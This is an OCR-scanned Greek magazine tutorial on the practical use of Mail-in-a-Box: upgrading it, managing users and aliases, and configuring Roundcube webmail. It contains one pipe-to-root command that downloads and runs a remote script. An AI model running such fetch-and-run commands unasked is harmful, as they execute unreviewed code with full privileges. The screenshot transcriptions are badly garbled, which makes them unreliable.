µε Jumbo-Pack Plus χρειαζόμαστε ακόµα, WOTE να προχωρήσουμε 
στην κλήρωση. 


Προσέξτε: Av και θα περιμένουμε όσο χρειαστεί για να έχουµε 25 
συνδρομητές µε Jumbo-Pack Plus και να τους κληρώσουµε ro Mac 
mini, αυτό δεν σημαίνει ότι δεν μπορούμε να κάνουμε κάτι για va ETU- 
σπεύσουµε τη διαδικασία. Κάντε αυτό που πρέπει, συμπληρώνοντας 
τη φόρμα παραγγελίας: http://deltahacker.gr/pdf12order/#s2 


Καλή σας επιτυχία! 


Skill: Intermediate 
Tags: users, aliases, mail rules, DNS API, dynamic DNS, pfSense, graylisting, SpamAssassin 


Πρακτική χρήση 
του Mall-In-a-Box 
και κόλπα 


Στο πλαίσιο του αφιερώματός µας για τη δηµιουργία ενός ασφαλούς mailserver 
που ελέγχουμε εμείς και μόνον εμείς, έχουµε ήδη φτάσει στο σηµείο όπου 
διαθέτουμε ένα καλορυθµισµένο κι ασφαλές VPS στο cloud, το οποίο τρέχει 
το Mail-in-a-Box: Πρόκειται για µια πλατφόρμα λογισμικού που παρέχει όλες 
τις λειτουργίες ενός σύγχρονου mailserver, καθώς και υπηρεσίες DNS. Στο 
παρόν άρθρο, το τελευταίο της σειράς, φωτίζουμε κατ’ αρχάς ορισμένες 
ενδιαφέρουσες όψεις του MiaB. Επίσης, µετά απὀ δύο περίπου μήνες συνεχούς 
λειτουργίας και καθημερινής χρήσης, σας μεταφέρουμετις εντυπώσεις µας 
περί των επιδόσεων και της συμπεριφοράς του όλου συστήµατος. 


του Χρήστου Βαρελά 


Λίγο πριν ξεκινήσουμε τη συγγραφή του άρθρου που τώρα διαβάζετε, παρατηρή- 
caue στο Twitter feed του MiaB (@Mailinabox) ότι εἶχε κυκλοφορήσει νέα έκδοση 
του συστήµατος. Θελήσαμε βεβαίως ν' αναβαθµίσουµε το λογισμικό στον δικό µας 
server, οπότε συνδεθήκαµε στο VPS µέσω SSH και πληκτρολογήσαμε τα ακόλουθα: 


sub0@box:~$ curl -s https://mailinabox.email/bootstrap.sh | sudo bash 


Στις ερωτήσεις που είδαμε αφήσαμε τις προεπιλεγμένες απαντήσεις 
και µετά απὀ λίγα λεπτά είχαμε την πλέον πρόσφατη ἐκδοση Tou MiaB, 
η οποία τη στιγμή που γράφονται αυτές οι γραμμές εἶναι η 0.2ο. Γενι- 
κά, τις αλλαγές/διορθώσεις που εισάγει µια νέα ἐκδοση μπορούμε να τις 
τσεκάρουµε µε την ησυχία µας στο αντίστοιχο CHANGELOG, oro GitHub 
(https://github.com/mail-in-a-box/mailinabox/blob/master/CHANGELOG.md). Δείτε 
τα ακόλουθα screenshots και διαβάστε τις αντίστοιχες περιγραφές για μερικές από 
τις εμφανείς αλλαγές που εντοπίσαµε στη νέα ἐκδοση. 
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Πρακτική χρήση του Mail-In-a-Box και κόλπα 


eee <> m * ο & box.colderxyz/admin v ug E= E 


Log out? 


box.colder.xyz 


Log in here for your Mail-in-a-Box control panel. 


Email talk2us@colder.xyz * 


paswa Ñ aad | * 


Remember me 


Sign in 


This is a Mail-in-a-Box. 


Μετά την qvoBd8uuon από τη γραμμή εντολών του VPS, από rov web browser της 
επιλογής µας συνδεόµαστε στο web control panel του MiaB και συγκεκριµένα στο 
λογαριασμό του διαχειριστή. Πα εμάς, το email του διαχειριστή είναι το talk2us@ 
colder.xyz. 


eoe « m * ο box.colder.xyz/admin Ó hic 


Log out? 


System Status Checks 


System 
Υ All system services are running. 
Υ SSH disallows password-based login. 
There are 13 software packages that can be updated. 


login (1:4.1.5.1-1ubuntu9.1) 

udev (204-5ubuntu20.13) 

libudev1 (204-5ubuntu20.13) 
libpam-systemd (204-5ubuntu20.13) 
systemd-services (204-5ubuntu20.13) 
libsystemd-daemonO (204-5ubuntu20.13) 


libpartedOdebian1 (2.3-19ubuntu1.14.04.1) 
libsystemd-loginO (204-5ubuntu20.13) 
libunbound?2 (1.4.22-1ubuntu4.14.04.2) 
passwd (1:4.1.5.1-1ubuntu9.1) 

dh-python (1.20140128-1ubuntu8.2) 
iproute2 (3.12.0-2ubuntu1) 

parted (2.3-19ubuntu1.14.04.1) 


y System administrator address exists as a mail alias. [administrator&box.colder.xyz = talk?usGcolder.xyz] 


Y  Thedisk has 21.4 GB space remaining. 


Network 


Y Outbound mail (SMTP port 25) is not blocked. 


Κατάτην πρώτη µας σύνδεση διαπιστώσαμε ότι µια σειρά πακέτων χρειάζονταν 
επίσης αναβάθµιση. Επρόκειτο για πακέτα rou Ubuntu Server που δεν είχαν σχέ- 
ση µε ro MiaB. H αναβάθµισή τους έγινε απὀ την κονσόλα, µε χρήση του κλασικού 
"σχήματος" sudo apt-get update και sudo apt-get upgrade. 
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eoe < 


* 
° 


& box.colder.xyz/admin [o ^ Ec [μη 


Y Postmaster contact address exists as a mail alias. [postmasterGbox.colder.xyz ^ administrator&box.colder.xyz] 


Y Domain is not blacklisted by dbl.spamhaus.org. 


Y SSL certificate is signed ἃ valid. The certificate expires in 308 days on 06/02/16. 


colder.xyz 
v DNSSEC 'DS' record is set correctly at registrar. 
Y Nameservers are set correctly at registrar. [ns1.box.colder.xyz; ns2.box.colder.xyz] 
Y  Domain's email is directed to this domain. [colder.xyz ^ 10 box.colder.xyz] 
Y Postmaster contact address exists as a mail alias. [postmasterGcolder.xyz > administrator&box.colder.xyz] 
Y Domain is not blacklisted by dbl.spamhaus.org. 
Y Domain resolves to this box's IP address. [colder.xyz + 46.101.173.140] 
Y 58: certificate is signed ἃ valid. Using multi/wildcard certificate of box.colder.xyz. The certificate expires in 308 days on 
06/02/16. 
www.colder.xyz 
Y Domain resolves to this box's IP address. [www.colder.xyz » 46.101.173.140] 


The SSL certificate for this domain is currently self-signed. Visitors to a website on this domain will get a security warning. If 
you are not serving a website on this domain, then it is safe to leave the self-signed certificate in place. Use the SSL 


Certificates page in this control panel to install a signed SSL certificate. 


This is a Mail-in-a-Box. 


Λίγο πιο κάτω στη σελίδα µε τα αποτελέσµατα των ελέγχων του MiaB, 
βλέπουμε ότι για το domain µας (colder.xyz) είναι πλέον ορισμένο ένα νέο 
subdomain (το "www'). H προηγούµενη έκδοση rou MiaB δεν μεριμνούσε για 
το www.colder.xyz. Χαιρόμαστε που η παρούσα ἐκδοση φροντίζει για τον 
ορισμό του www.colder.xyz, όµως το θέµα τώρα εἰναι ότι το δωρεάν πιστο- 
ποιητικό που έχουµε πάρει από τη StartCom ισχύει για ro colder.xyz και για 
*éva* μόνο subdomain (το "box. Μπορούμε βεβαίως να αγοράσουμε ένα 
wildcard certificate από τη StartCom (κοστίζει περί τα 60 δολάρια), το οποίο 
θα καλύπτει κάθε subdomain του colder.xyz. Λόγω όµως των capital controls 
αλλά κι επειδή δεν έχουµε (ακόµα) κάποιο δικτυακό τόπο στο colder.xyz, απο- 
φασίσαμε v' αφήσουμε την αγορά wildcard certificate γι αργότερα. Μην ξε- 
χνάτε και TO άλλο: Από το Σεπτέμβριο θα είναι στον αέρα η υπηρεσία Let's 
Encrypt (https://letsencrypt.org), χάρη στην οποία θα μπορούμε να αποκτάµε, 
πολύ εὐκολα και πάντα δωρεάν, πιστοποιητικά για τα domains µας και όποια 
subdomains θέλουμε. Στοιχηματίζουμε μάλιστα ότι σύντομα θα κυκλοφο- 
ρήσει κι ἐκδοση του MiaB που θα φροντίζει για την αυτόματη εγκατάσταση 
υπογεγραμμένων πιστοποιητικών από το Let's Encrypt. Λέτε να υπολογίζουμε 
λάθος; Υπάρχει ένας τρόπος για va το μάθουμε ;) 


Πρακτική χρήση του Mail-In-a-Box και κόλπα 


eoe < υπ] * ο box.colder.xyz/admin/munin/network-day.html [5 hs [E 


Critical (0) Firewall Throughput 
Warning (0) box.colder.xyz :: Firewall Throughput 


Unknown (0) Firewall Throughput - by day 


Groups 24 
colder.xyz 


Categories 5 
disk[dwmy] Ë 14 
munin [d w m y] £ 12 
network [ d w m y ] 
postfix [d w m y ] 
processes [ d w m y ] 
system [d wm y] 
time [ d w m y ] 


Last update. Wed Jul 29 14:50. 


Hosts blacklisted by fail2ban 
box.colder.xyz :: Hosts blacklisted by fail2ban 


Hosts blacklisted by fail2ban - by day 


ΤΙ 


Last update: Wed Jul 29 


Number of hosts 


Κοιτάζοντας λίγο πιο προσεκτικά στα μενού rou control panel, ανακαλύπτου- 
με ότι κάτω από ro System υπάρχει ένα νέο entry, ονόματι Munin Monitoring. 
Από την αντίστοιχη επιλογή αποκτάµε πρόσβαση σε µια πληθώρα στατιστικών 
που αφορούν στη λειτουργία του VPS κι απεικονίζονται σε γραφήματα. Από TO 
Categories στ' αριστερά, µε κλικ πάνω στοπεϊννο[κδιαπιστώσαµε ότιτο Fail2ban 
που τρέχει στο box µας δεν απασχολεί απλά τον επεξεργαστή, αλλά έχει πράγ- 
ματι μπλοκάρει κάποια IPs. Περισσότερα για ro Fail2ban µπορείτε va διαβάσετε 
στο σχετικό άρθρο του τεύχους 034 (http://deltahacker.gr/deltahacker034). 


eoe <> m ο box.colder.xyz/admin $ eh m B 


Log out? 


Mail-in-a-Box Version 


You are running Mail-in-a-Box version v0.12c. 
The latest version of Mail-in-a-Box is | v0.12c . 


To find the latest version and for upgrade instructions, see https://mailinabox.email/, release notes, and upgrade instructions. 


This is a Mail-in-a-Box. 


Στην πάνω οριζόντια μαύρη μπάρα rou MiaB υπάρχει, πλέον, η επιλογή Version. 
Από εκεί βλέπουμε την ἐκδοση του συστήµατος που τρέχουμε. Επίσης, µε κλικ 
πάνω στο σχετικό κουμπάκι ελέγχουμε αν έχει κυκλοφορήσει νεότερη έκδοση. 
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Χρήστες και aliases 


Μετά την πρώτη εγκατάσταση του MiaB διαθέτουμε ακριβώς έναν χρήστη email, 
o οποίος τελεί και χρέη διαχειριστή. Όταν λέμε "διαχειριστής" δεν εννοούμε TOU 
λειτουργικού συστήµατος, αλλά µόνο του MiaB. Για την πρόσβαση στο email του 
διαχειριστή πηγαίνουμε στη διεύθυνση https://colder.xyz/mail και κάνουμε login 
στο webmail interface που παρέχεται απὀ το Roundcube (https://roundcube.net) kat 
εἶναι ήδη εγκατεστημένο και ρυθµισµένο. Περισσότερα για το Roundcube θα δού- 
µε στην επόμενη ενότητα. Προς ro παρόν, ας πάµε στο web control panel του MiaB 
(https://box.colder.xyz/admin) και συγκεκριµένα στο Mail > Users. Από αυτή τη σε- 
λίδα μπορούμε να ορίζουμε νέους λογαριασμούς email. Λογικό κι αναμενόμενο είναι 
να φτιάξουμε τουλάχιστον έναν λογαριασμό, αφού δεν θα θέλουμε να στέλνουμε 
και να λαμβάνουμε email από το λογαριασμό του διαχειριστή. Εμείς, για παράδειγµα, 
έχουμε φτιάξει ένα νέο λογαριασμό email, µε διεύθυνση subzraw@colder.xyz. Επειδή 
όμως αυτό ro "subzraw" δεν εἶναι κατάλληλο για κάθε περίσταση, θέλαμε κι έναν πιο 
επίσημο λογαριασμό, µε διεύθυνση του στιλ christosvarelas@colder.xyz. Μιλάμε για 
TO (Oto φυσικό πρόσωπο, ápa αντί να φτιάξουμε άλλον éva λογαριασμό δημιουργή- 
cape éva alias προς την υπάρχουσα διεύθυνση email (subzraw@colder.xyz). Τέτοια 
aliases έχει δημιουργήσει και το MiaB αυτομάτως, για τη διεύθυνση email του δια- 
χειριστή (talk2us@colder.xyz) και μάλιστα για δύο domains (ro box.colder.xyz και το 
colder.xyz). Για περισσότερες λεπτομέρειες δείτε τα screenshots που ακολουθούν 
και βεβαίως διαβάστε τις αντίστοιχες περιγραφές. 


eoe < m * ο & box.colder.xyz/admin ç e. gs i 


Users 


Add a mail user 


Add an email address to this system. This will create a new login username/password. 


Email Address % Password 3€ NormalUser + ΜΕ 


* Passwords must be at least four characters and may not contain spaces. 

* Use aliases to create email addresses that forward to existing accounts. 

* Administrators get access to this control panel. 

* User accounts cannot contain any international (non-ASCII) characters, but aliases can. 


Existing mail users 
Email Address Actions Mailbox Size 


colder.xyz 


subzrawGcolder.xyz set password | make admin | archive account 21.1 MB 


talk2usQGcolder.xyz admin (remove privilege) | set password | archive account 336 KB 


This is a Mail-in-a-Box. 


Στον mailserver µας έχουµε δύο λογαριασμούς email. O ένας είναι rou διαχειριστή 
(talk2us@colder.xyz) κι ο άλλος του γράφοντα (subzraw@colder.xyz). Θα ropov- 
OAE να έχουµε περισσότερους λογαριασμούς, αλλά προς το παρόν a) κάποιοι 
συνεργάτες προτιμούν ro παλιομοδίτικο email τους, B) εμείς δεν χρειαζόμαστε 
νέο λογαριασμό email. Χρειαζόμαστε όµως aliases. Συνεχίστε το διάβασμα. 


Β8 


Πρακτική χρήση του Mail-In-a-Box και κόλπα 


eoe < n * ο box.colder.xyz/admin e åka ES 


Aliases 


Add a mail alias 


Aliases are email forwarders. An alias can forward email to a mail user or to any email address. 


Regular Catch-All Domain Alias 


Alias incoming e 


You may use international (non-ASCII) characters for the domain part of the email address only. 


Forward | forward to these email addresses (one per line or separated by commas 


Add Alias 


Ta aliases (ψευδώνυμα) μπορούμε va ra φανταζόμαστε ως μηχανισμούς που 
προωθούν τα εισερχόμενα emails. Παράδειγμα: Έχω το λογαριασμό µε διεύθυν- 
ση subzraw(Qcolder.gr κι αντί να φτιάξω νέο λογαριασμό µε την πιο σοβαρή διεύ- 
θυνση christos.varelas@colder.xyz, φτιάχνω απλά ένα allas του subzraw@colder. 
xyz το οποίο ονομάζεται christos.varelas@colder.xyz. Έτσι, όποιο email φτάνει 
στο christos.varelas@colder.xyz, καταλήγει αυτομάτως oro inbox του subzraw@ 
colder.xyz. Επίσης, αντί να στέλνω email µόνο απὀ ro subzraw@colder.xyz, urto- 
pw τώρα να στέλνω από ro christos.varelas@colder.xyz. Όπως λένε και oro Λευ- 
καντί Ευβοίας, for all intents and purposes ra subzraw(gcolder.xyz και christos. 
varelas(gcolder.xyz είναι ένα και το αυτό. To MiaB επιτρέπει τον ορισμό τριών 
ειδών allases. 


* Regular. Πρόκειται για allases που ουσιαστικά επιτρέπουν σε έναν υπάρ- 
χοντα λογαριασμό να έχει περισσότερες από μία διευθύνσεις email, στο 
(Oto domain. Παράδειγμα: O χρήστης µε διεύθυνση email την subzraw@ 
colder.xyz έχει δύο aliases, ra christos.varelas@colder.xyz και cvar@colder. 
xyz. Μπορεί λοιπόν να στέλνει email από οποιαδήποτε εκ των τριών αυτών 
διευθύνσεων, ενώ τα εισερχόμενα μηνύματα σε καθεμία απ αυτές καταλή- 
γουν στο ἰδιο inbox (ev προκειμένω, σ αυτό του subzraw(Qcolder.xyz). 


e Catch-All. Ένα alias αυτού του είδους πιάνει εισερχόμενα µυνήµατα σε Ot- 
ευθύνσεις του domain που "δεν υπάρχουν” και τα προωθεί σε μία ñ περισ- 
σότερες ἈυπαρκτέςἨ διευθύνσεις του *(Otou* domain. 


e Domain Alias. Ένα alias του είδους πιάνει εισερχόμενα μηνύματα σε διευ- 
θύνσεις του domain που “δεν υπάρχουν”, αλλά σε αντίθεση µε éva catch- 
all alias τα στέλνει σε αντίστοιχες υπαρκτές διευθύνσεις ενός άλλου” 
domain. Παράδειγμα: Έχουμε τα domains colder.xyz και parabing.com, δεν 
υπάρχει ο λογαριασμός mpapadop(acolder.xyz αλλά υπάρχει o mpapadop@ 
parabing.com. Μετά τον ορισμό του κατάλληλου domain alias, όλα τα emails 
που απευθύνονται στο mpapadop(acolderxyz δεν απορρίπτονται αλλά 
προωθούνται στο mpapadop@parabing.com. 
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...&à box.colderayz/admin Ξ $c g 


Existing mail aliases 


Alias Forwards To 
box.colder.xyz 
Pil] abuseQbox.colder.xyz talk2usGcolder.xyz 
P4 adminGbox.colder.xyz administrator&box.colder.xyz 
p administrator&box.colderxyz talk2us@colder.xyz 
P4 hostmasterGbox.colder.xyz administrator&box.colder.xyz 
p, postmasterGbox.colder.xyz administrator&box.colder.xyz 
colder.xyz 
^ i]  abuseGcolderxyz talk2usGcolder.xyz 
“ΠΠ christos.varelas@colder.xyz subzraw@colder.xyz 
+ ü deltahacker@colder.xyz talk2us@colder.xyz 
«ΠΠ parabingGcolder.xyz talk2us@colder.xyz 
Plu talk2usQcolder.xyz subzrawGcolder.xyz 
p, adminGcolder.xyz administrator&box.colder.xyz 
κα postmaster@colder.xyz administrator@box.colder.xyz 


hostmaster@, postmaster@, and admin@ email addresses are required on some domains. 


Ιδού όλα Ta aliases που ισχύουν για τον mailserver µας. Έχουμε, T.X., φτιά- 
ξει το christos.varelas@colder.xyz, για τη διεύθυνση subzraw@colder.xyz. 
Σημειώστε ότι τα περισσότερα aliases τα χει φτιάξει το MiaB αυτόματα, 
αφορούν σε δύο domains (box.colder.xyz και colder.xyz) κι ἔχουν σχέση µε 
το email του διαχειριστή (talk2us@colder.xyz). Θα παρατηρήσετε ότι υπάρ- 
χουν aliases προς aliases. Παράδειγμα: Το admin@box.colder.xyz είναι alias 
του administrator@box.colder.xyz κι αυτό µε τη σειρά του εἶναι alias του "ka- 
νονικού” talk2us@colder.xyz.[loparnpoñnorg εξάλλου kat µια άλλη χρήση των 
aliases: Κατά κύριο λόγο διαχειριζόμαστε ro email του subzraw@colder.xyz 
και τα όποια εισερχόμενα μηνύματα στο λογαριασμό του talk2us@colder.xyz 
θέλουμε να φτάνουν o' εμάς κι όχι va συνδεόµαστε στο λογαριασμό του TE- 
λευταίου. Για να ισχύει αυτή η διευθέτηση, αρκεί να ορίσουμε το talk2us@ 
colder.xyz ως alias του subzraw@colder.xyz. 


Πρακτική χρήση του Mail-In-a-Box και κόλπα 


Καλωσορίστε το webmail 


Το webmail του MiaB παρέχεται από το Roundcube, το οποίο αποτελεί δημοφιλή 
επιλογή για όλους όσοι φτιάχνουν τα δικά τους συστήµατα διαχείρισης email. Το 
Roundcube δείχνει ελαφρώς παλιομοδίτικο σε σύγκριση µε ra webmail interfaces 
των μεγάλων παικτών (βλέπε Google, Yahoo και Microsoft). Μη φανταστείτε όµως 
ότι υστερεί σηµαντικά σε ευκολία χρήσης, σε εμφάνιση ñ σε δυνατότητες. Αν και 
γενικά εἶμαστε οπαδοί του webmail -και µόνο το γεγονός ότι έχεις πρόσβαση στο 
email σου από έναν οποιονδήποτε web browser εἶναι µια ιδιαίτερα σηµαντική δυνα- 
τότητα--, τους τελευταίους μήνες έχουµε γίνει ξανά οπαδοί των email clients (για 
το desktop ή για ro smartphone/tablet). O λόγος είναι διότι, µε τον κατάλληλο email 
client, είναι πολύ πιο εύκολο να υπογράφεις ψηφιακά ή/και να κρυπτογραφείς TO 
email σου. Περισσότερα για την κατάλληλη ρύθμιση ενός οποιουδήποτε email client, 
ώστε να συνεργάζεται µε το MiaB, θα συζητήσουμε στην επόμενη ενότητα. Προς το 
παρόν, αξίζει να παρατηρήσουμε πιο προσεκτικά ορισμένες όψεις και δυνατότητες 
του Roundcube. Σκεφτείτε πως, ασχέτως αν σκοπεύετε να καταφύγετε σε κάποιον 
email client ή όχι,θα υπάρχουν περιπτώσεις κατάτις οποίες το webmail interface του 
Roundcube θα αποδεικνύεται χρήσιμο. Φορές, T.X., θα θέλετε να ελέγξετε ro email 
από κάποιον υπολογιστή που δεν είναι δικός σας ñ δεν έχει κάποιον email client 
εγκατεστημένο. 


eoe < Ë * oO B box.colder.xyz/mail/ e [130 al ο πι 


roundcube 


open source webmail software 


Welcome to Mail-in-a-Box/Roundcube Webmail 


Username |subzrawQcolder.xyz E? 


Password  |eeeeeeceesseccccoscco .... 3H 


Login 


O Keep me logged in 


Mail-in-a-Box/Roundcube Webmail e Get support 
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eee < D * ο & box.colderxyz/msil/? task-mail& mbox-INBOX 3 μα κα - 
yz (Ó Logout 
roundcube 4. Address Book F settings 
> + S cA 
2 w πὲ. m. ú = 7. ^ aia- 
Refresh Compose Reply Reply all Forward Delete Archive Mark More == Ei i me 
Q Inbox Ὁ- Subject È From Date Size s 
2 Ὀιαῖς * Re: δεν θυμάμαι :/ Παναγιώτης Βαρελάς 2015-06-25 1217 ne 
& sex Hi Christos, we have recommended courses for you Coursera. 2015-07-20 11:00 55 κα 
NT zame Theory | and II Game Theory Il: Advanced Appli... 2015-07-20 09:42 
E Junk 
È Trash 
Archi 
LO Ele [sea Ξ| Tee Ξ Messages 1 to 3 of 3 Bana [-] 
m 2015 —— —— = 
ΒΕ Newsletters ` New Sessions of Game Theory | and II E= ο < ο e 
ΓΤ From Game Theory It: Advanced Applications Course Team «noreplyGcourseraorg» 3^ Date 2015-07-20 09:42 > 
B system — 
— Å To protect your privacy, remote images are blocked in this message. Display images 
Bü Travel [πο] | Always show images from noreplyGcoursersorg <q — 
Christos Varelas, 
The latest information from Game Theory Il: Advanced Applications by Stanford University and The 
University of British Columbia on Coursera. 
Hello All, 
We will run new sessions of the introductory and advanced game theory courses this 
fall and winter. 
The course "Game Theory" will run again beginning on September 11, 2015. 
A description of the course and the sign up are available at: 
https:/Iclass.coursera.org/gametheory-005íclass. 
(it is the newest session in the drop-down menu). 
w- We will also run a new session of "Game Theory Il: Advanced Applications" beginning 


Εξ ορισμού και για λόγους ασφαλείας, το φόρτωμα εικόνων στα HTML emails είναι 
απενεργοποιηµένο. Κάθε φορά που ανοίγουμε ένα HTML email µε μπλοκαρισµένες ει- 
κόνες, έχουµε την επιλογή va τις φορτώσουμε μόνο για το συγκεκριµένο email (κλικ 
στο Display images) ή για όλα ra επόμενα email από rov (oto αποστολέα (κλικ στο Always 
show images from...). 


ece < m * ο Â box.colder.xyz/mai/? task-mail& mbox-INBOX ó ας ο 


roundcube 
"d ^ 2 = 
2 gm 5, ^2. e. Β M o... ΑΙ sia- 
Refresh Compose ly Reply all Forward. Delete. Archive Mark More 
Q imbox ᾱ- subject * rom Date sie -.Φ 
f prafts HÚ * Re: Δεν θυμάμαι :/ Παναγιώτης Βαρελάς, 2015-06-25 12:17 11KB 
& sen Hic rec s fory Coursera 2015-07-20 11:00 
New Sessions of Game Theory ! and II Came Theory Il: Advanced Appli. 2015-07-20 09:42 32 KB 
ICE 
W το L| 
| 
Archive 
NI Ele “sea 2 | Threads 5 Messages 1 to 3 of 3 Mos ». Ν n 
@ 2015 — — = — 
Ë Newsletters. ` Hi Christos, we have recommended courses for you σα ο s% =- = 
8 social | From — Coursera «noreply&courseraorg» X* Date 2015-07-20 11:00 
Ë system 
Bl τανε ο coursera 


Recommended Courses 


View all courses 


Ιδού κι ένα email µε περιεχόµενο HTML, όπου το φόρτωμα των εικόνων επιτρέπεται: 
όπως βλέπετε, ra πάντα προβάλλονται κανονικά. Σε γενικές γραμμές, καλό είναι va επι- 
τρέπουµε το φόρτωμα εικόνων *uóvo* για τα email συγκεκριμένων αποστολέων, τους 
οποίους εμπιστευόµαστε. 
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Πρακτική χρήση του Mail-In-a-Box και κόλπα 


Settings Section 
ΓΩ Preferences ja User Interface. 
iH Folders Iz Mailbox View 


m Εξ. Displaying Messages 


BH Special Folders 


ΕΦ Address Book 
- 


£ Server Settings 


box.colder 


User 


xyz/mai 


E vail 


μον 
Main Options 

English US) 
Auto 

v B 


2015-07-24 ËJ 


πο CE | 


Interface skin 


Δ. Address Book 


Browser Options 


Handle popups as standard windows 


Ακολουθώντας τη διαδρομή Settings > Preferences > User Interface, έχουµε τη δυνατό- 
τητα να καθορίσουμε μερικές παραμέτρους της όψης rou webmail interface. To προεπι- 
λεγμένο skin είναι το φωτεινό Classic, o' εμάς ωστόσο αρέσει το περισσότερο σκοτεινό 


ονόματι Larry. 


About Get support 


roundcube e 


Settings Section 

L] Preferences [Z] User Interface 

BH Folders Iz Mailbox View 

XX. Identities | Displaying Messages 


B8 Responses im Composing Messages 


E Password Eli Address Book 
Y Filters BW. Special Folders 
ES 


T^ Vacation £ Server Settings 
< 


box.colder.xyz/mail/?_task=settings 


Di 


PES vail 


isplaying Messages 


Main Options 


Open message in a new window 

Show email address with display name 
Display HTML 

Display remote inline images 

Display attached images below the message 


After message delete/move display the next message 


Advanced options 


iderxyz “(D Logout 


Δ. Address Book 


from known senders V 


Στο Preferences > Displaying Messages φροντίζουμε ώστε ναισχύει Display remote inline 
images = from known senders. Αυτό σηµαίνει ότι οι απομακρυσμένες εικόνες στα HTML 
emails δεν θα φορτώνονται παρά µόνο κατά περίπτωση, όπου εμείς οι ίδιοι έχουµε δη- 


λώσει ότι εμπιστευόµασ 


£ TOV αποστολέα. 
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esoe < Eu] * o 3 boxcolderyz/mail? tesk-setings ο lolo 


Sens BM zi pum 


ΓΩ Preferences. ΤΊ User Interface qm " 
= || Main Options 
LE lm Mailbox View 
[| Compose in a new window 
8 identities Displaying Messages v 
| Compose HTML messages ver E 
Ml Responses Επ) Composing Messages po B 
ES] Password Tli. Address Book oh every 5 minutots)_ E) 
Y Files Ë Special Folders | elpt 
AD vacation £ Server Settings Always request a delivery status notification 
Place replies in the folder of the message being replied to 
When repling start new mensage above the quote ËJ 
[| messages forwarding inline B 
" 
Ü| oetsut tont οΓΗΤΜΙ message Verdana B wB 
| 
Default action of [Reply all] button reply to ali B 


Signature Options 


Automatically add signature. 


= B 


Spellcheck Options 


Μας αρέσει να ισχύει Compose HTML messages = never. Σίγουρα δεν μπορούμε va Ká- 
VOULE πολλά για όσους προτιμούν να μάς στέλνουν HTML emails, εμείς όµως γνωρί- 
ζουμε καλύτερα ώστε να στέλνουµε μηνύματα "μόνον σε µορφή απλού κειµένου (plain 
text messages). Ίσως κάποιοι παραλήπτες va τα θεωρούν ἄσχημα ή/και παλιομοδίτικα, 
αν όµως το καλοσκεφτείτε πιστεύουμε ότι θα συμφωνήσετε κι εσείς πως, ακόµη κι εν 
έτει 2015, είναι πιο αποτελεσματικό αλλά κι ευγενικό να στέλνεις plain text messages. 


eoe < m * ο & box.colder-xyz/maii/?_task=settings&_action=identities G lolo 


roundcube e 


κ... | Edit identity 
L] Preferences Christos Varelas <christos.varelas@cold... Settings 
LE subZraw <subzraw@colder.xyz> | 
ΠΩ saq, 
ES] Password |] | Organization. Colder Inc. 
Y res EET 
AD vacation 
Bcc 
Set default 5 
Signature 


Στη στήλη Identities προσθέτουμε όλες τις ταυτότητες που αφορούν oro (Oto φυσικό 
πρόσωπο. Ουσιαστικά, έχουµε τη δυνατότητα να βάλουμε τα όποια aliases έχουµε opi- 
σει για ro email µας. Έτσι, από το παράθυρο σύνταξης νέου μηνύματος ή από ro παράθυ- 
po όπου TÁLE να συντάξουµε απάντηση σε μήνυμα που έχουμε λάβει, θα μπορούμε va 
επιλέγουμε τη διεύθυνση email από την οποία επιθυμούμε να φαίνεται ότι προέρχεται 
το μήνυμα. 
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959 ¿uj * ο box.colder.xyz/mai 


roundcube e TES Wal $ Address Book 


Settings Fiter sets Fiters Fiker definition 
LÀ Preferences roundcibe. System Related 
ΒΘ roles | seat 

4. Menutes Newsleters 
Ë Responses Travel 

Ἐπ Password 

Y Fiers 

LAT 


E D asuppertfacebook.cc 


BD cius ooogiecom 


4 ᾱ- -oÓr] 


Από την κατηγορία Filters των ρυθμίσεων rou Roundcube, ορίζουµε κανόνες για ra £t- 
σερχόµενα μηνύματα. Πρόκειται για δυνατότητα που, αν µη τι άλλο, µας διευκολύνει 
τρομερά να βάζουμε τάξη στο inbox µας. Στο screenshot φαίνονται οι κανόνες για τα 
εισερχόμενα μηνύματα που θέλουµε va καταλήγουν αµέσως στον φάκελο Social (ναι, ro 
Roundcube επιτρέπει τη δηµιουργία φακέλων). Σημειώστε ότι οι κανόνες που ορίζουμε 
δεν ισχύουν µόνο για το Roundcube αλλά αντικατοπτρίζονται και σε κάθε άλλον email 
client διαχειρίζεται τα μηνύματα του λογαριασμού µας. 


Ρύθμιση email client 


Όπως και να το δει κανείς, ένας καλός email client παρέχει περισσότερη ευελι- 
ξία σε σχέση µε το όποιο webmail interface. Βέβαια αυτή η ευελιξία εἰναι "τοπική" 
ρυθµίζοντας έναν email client σε κάποιον από τους υπολογιστές ή τις συσκευές 
μας, δεν διασφαλίζουµε ότι οι ίδιες ρυθμίσεις θα ισχύουν και σε άλλους υπολο- 
γιστές/συσκευές, ακόµη κι αν τρέχουμε παντού τον (Oto client. To ίδιο ισχύει και 
µε τους κανόνες για τα εισερχόμενα ñ για την εκπαίδευση του όποιου anti-spam 
filter. Εξάλλου, όποτε επιθυμούμε πρόσβαση στο email µας απὀ συσκευή που δεν 
εἶναι δική µας, εννοείται ότι δεν θα καθήσουµε va εγκαταστήσουµε κάποιον email 
client πρώτα. Μήπως λοιπόν να ξεχάσουμε τον όποιον client και va αφοσιωθούμε 
στο Roundcube rou MiaB, αφού o' αυτό έχουμε πρόσβαση απ’ όπου υπάρχει web 
browser, άρα πρακτικά από παντού; Δεν υπάρχει σωστή απάντηση για το ερώτημα: 
όλα εξαρτώνται απὀ το πώς χρησιμοποιεί κάποιος το email του και τι ανάγκες/επι- 
θυμίες έχει. Εμείς, T.X., ἔχουμε αποκτήσει τη συνήθεια να υπογράφουµε ψηφιακά 
όλα τα emails που στέλνουµε, ενώ όποτε εἶναι δυνατόν τα κρυπτογραφούμε κιό- 
λας. Κατά περιπτώσεις, οι δύο αυτές ενέργειες είναι δυνατό να γίνονται *kat* µέσα 
από ro interface κάποιου webmail. Όσοι όµως παίρνουν στα σοβαρά την υπόθεση 
της ισχυρής κρυπτογράφησης rou email, αργά ñ γρήγορα (μάλλον το δεύτερο) στρέ- 
tpovrat στον κατάλληλο client. (Δείτε περισσότερα στα δύο εκτενή video tutorials, 
στο http://deltahacker.gr/howto-strongly-encrypt-email) Π' αυτό κι από τη µεριά 
μας σπάνια συνδεόµαστε στο Roundcube και, κατά κύριο λόγο, χρησιμοποιούμε TO 
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συνδυασμό Thunderbird-Enigmail, σε éva κλασικό PC και o' éva MacBook Pro. Υπάρ- 
χει βέβαια και ro (Android) smartphone, όπου εκεί έχουµε ρυθμίσει κατάλληλα τη 
